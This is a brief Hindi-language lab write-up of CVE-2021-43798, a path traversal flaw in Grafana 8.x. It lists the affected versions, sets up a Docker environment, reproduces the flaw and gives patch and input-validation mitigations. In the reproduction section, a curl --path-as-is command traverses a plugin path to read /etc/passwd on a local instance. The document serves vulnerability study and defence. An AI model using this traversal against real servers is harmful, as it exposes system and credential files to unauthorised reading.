CVE-2021-43798
1. सारांश
- Grafana एक ओपन-सोर्स प्लेटफ़ॉर्म है जो डेटा मॉनिटरिंग और प्रबंधन का समर्थन करता है। निम्नलिखित संस्करणों में, ../ जैसे विशेष वर्णों का उपयोग करके फ़ाइल पथों में हेरफेर करने की अनुमति देने वाला एक पथ ट्रैवर्सल (Path Traversal) दोष मौजूद है:
- 8.0.0 और उससे ऊपर, लेकिन 8.0.7 से नीचे
- 8.1.0 और उससे ऊपर, लेकिन 8.1.8 से नीचे
- 8.2.0 और उससे ऊपर, लेकिन 8.2.7 से नीचे
- 8.3.0
- कमजोर पथ <grafana_host_url>/public/plugins/<plugin_id>/ है, जहाँ <plugin_id> स्थापित प्लगइन का आईडी है। नीचे दिए गए संदर्भ के माध्यम से कमजोर पथ की पुष्टि की जा सकती है।
2. कमजोर वातावरण की संरचना और निष्पादन
2.1 उपयोग किया गया वातावरण
2.2 निष्पादन विधि
docker-compose up -d
3. दोष का पुनरुत्पादन
- खुले पृष्ठ की पुष्टि करें
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd के माध्यम से /etc/passwd तक पहुँचा जा सकता था।
4. निष्कर्ष (शमन उपाय)
- यदि आप दोष से प्रभावित संस्करण का उपयोग कर रहे हैं, तो कृपया पैच किए गए संस्करण 8.3.1, 8.2.7, 8.1.8, 8.0.7 पर अपडेट करें।
- पथ ट्रैवर्सल दोष को रोकने के लिए, केवल अनुमत पथों तक पहुँच की अनुमति देने वाली व्हाइटलिस्ट विधि लागू करें, और उपयोगकर्ता इनपुट के सत्यापन और पथ सामान्यीकरण करें ताकि पैरेंट डायरेक्टरी जंप (../) जैसी असामान्य पथ पहुँच को प्रतिबंधित किया जा सके।
संदर्भ सामग्री